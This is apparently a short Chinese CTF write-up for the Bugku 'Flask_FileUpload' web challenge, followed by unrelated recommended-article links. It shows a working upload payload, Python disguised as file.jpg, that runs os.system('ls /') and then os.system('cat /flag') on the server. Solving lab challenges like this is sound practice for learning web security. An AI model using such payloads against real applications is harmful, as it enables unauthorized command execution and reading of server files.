Bugku-web-Flask_FileUpload

黑白时光les2024-08-01 11:52

Bugku-web-Flask_FileUpload

查看源代码,提示用python返回结果

在file.jpg中写python代码

复制代码 
import os
os.system('ls / ')

上传后查看源代码,找到flag文件夹

修改代码

复制代码 
import os
os.system('cat /flag ')
相关推荐
YuanDaima204811 小时前
基于 LangChain 1.0 的检索增强生成(RAG)实战
人工智能·笔记·python·langchain·个人开发·langgraph
RopenYuan11 小时前
FastAPI -API Router的应用
前端·网络·python
听风吹等浪起11 小时前
用Python和Pygame从零实现坦克大战
开发语言·python·pygame
书到用时方恨少!12 小时前
Python Pandas 使用指南:数据分析的瑞士军刀
python·数据分析·pandas
走粥12 小时前
clsx和twMerge解决CSS类名冲突问题
前端·css
Purgatory00112 小时前
layui select重新渲染
前端·layui
智算菩萨13 小时前
【Pygame】第8章 文字渲染与字体系统(支持中文字体)
开发语言·python·pygame
:mnong13 小时前
全图纸语义理解升级分析
python·openvino·paddleocr·qt6.3·paddleocr-vl
qh0526wy13 小时前
pathlib 核心功能一览
python
热门推荐
01GitHub 镜像站点02Qwen3.5-Omni与Qwen3.6模型全面解析(含测评/案例/使用教程)03VMware Workstation Pro 17 虚拟机完整安装教程(2026最新)04OpenClaw 请求超时 llm request timed out 怎么解决?3 种方案实测,附完整排查流程052026年3月AI领域大事件:DeepSeek引领开源风暴06纯 HTML/CSS/JS 实现的高颜值登录页,还会眨眼睛!少女心爆棚!07最新更新版本,OpenClaw v2026.4.2 深度解读剖析:Task Flow 重磅回归与安全架构的全面硬化08【技术干货】Gemma 4 上手深度指南:本地多模态大模型的新基线09AI 编程效率翻倍:Superpowers Skills 上手清单 + 完整指南10Claude Code + GLM4.7 避坑指南:解决 Unable to connect to Anthropic services